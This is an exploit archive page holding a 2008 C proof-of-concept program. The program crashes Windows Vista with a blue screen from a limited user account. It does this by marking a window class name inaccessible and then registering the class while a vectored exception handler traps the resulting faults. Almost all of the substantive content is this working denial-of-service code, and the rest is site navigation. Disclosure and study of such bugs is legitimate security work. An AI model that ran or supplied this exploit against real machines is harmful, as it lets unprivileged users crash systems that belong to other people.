vista-access.txt

vista-access.txt: Posted Oct 6, 2008; Authored by Defsanguje; Microsoft Windows Vista access violation from limited account denial of service blue screen of death exploit.; tags | exploit, denial of service; systems | windows; SHA-256 | c1f3a692fc163324f440f798f6db2fa7d92396e6f59f7ed7e36df7e9ad735baf; Download | Favorite | View

vista-access.txt

// //////////////////////////////////////////////////////////////
// Windows Vista BSoD (Access violation) from limited account. //
// Tested on Home Premium & Ultimate @ October 05 2008         //
/////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>

WCHAR szClass[] = L"BSODClass";

int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo);
typedef void (WINAPI* pFunc)(ULONG ulFirst, LPVOID lpHandler);
pFunc pRtlAddVectoredExceptionHandler;

typedef struct
{
    DWORD dwWriteViolation;
    LPVOID lpAddress;
} EXCEPTION_ACCESS_VIOLATION_PARAMS;

int main()
{
    WNDCLASSW wc;
    DWORD dwOldProt;

    printf("Windows Vista BSoD from usermode/limited account.\n"
           "Coded by. Defsanguje - October 05 2008\n");

    // Setup vectored exception handler. SEH would work also.
    pRtlAddVectoredExceptionHandler = (pFunc)GetProcAddress((HMODULE)GetModuleHandle("ntdll.dll"),
                                                            "RtlAddVectoredExceptionHandler");
    (*pRtlAddVectoredExceptionHandler)(TRUE, ExceptionHandler);

    // Dummy data
    wc.style         = 0;
    wc.lpfnWndProc   = NULL;
    wc.cbClsExtra    = 0;
    wc.cbWndExtra    = 0;
    wc.hInstance     = GetModuleHandle(NULL);
    wc.hIcon         = NULL;
    wc.hCursor       = LoadCursor(NULL, IDC_ARROW);
    wc.hbrBackground = GetStockObject(HOLLOW_BRUSH);
    wc.lpszMenuName  = NULL;
    wc.lpszClassName = szClass;

    VirtualProtect(szClass, 1, PAGE_NOACCESS, &dwOldProt);
    RegisterClassW(&wc);

    printf("You shouldn't see this");
    return 0;
}

int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo)
{
    static LPVOID lpLastAddress;
    static DWORD dwOldProt;
    EXCEPTION_ACCESS_VIOLATION_PARAMS* avParams;
    switch(lpExceptionInfo->ExceptionRecord->ExceptionCode)
    {
        case EXCEPTION_ACCESS_VIOLATION:
            avParams = (EXCEPTION_ACCESS_VIOLATION_PARAMS*)lpExceptionInfo->ExceptionRecord->ExceptionInformation;
            VirtualProtect(avParams->lpAddress, 1, PAGE_READWRITE, &dwOldProt);
            lpLastAddress = avParams->lpAddress;

            // Set trap flag
            lpExceptionInfo->ContextRecord->EFlags |= 0x100;
            break;
        case STATUS_SINGLE_STEP:
            VirtualProtect(lpLastAddress, 1, PAGE_NOACCESS, &dwOldProt);
            break;
        default:
            break;
    }
    return EXCEPTION_CONTINUE_EXECUTION;
;
}

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 61 files
LiquidWorm 24 files
Debian 18 files
indoushka 15 files
Apple 9 files
Google Security Research 6 files
Gentoo 5 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,156)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,827)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,244)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

vista-access.txt

vista-access.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

vista-access.txt

Share This

vista-access.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems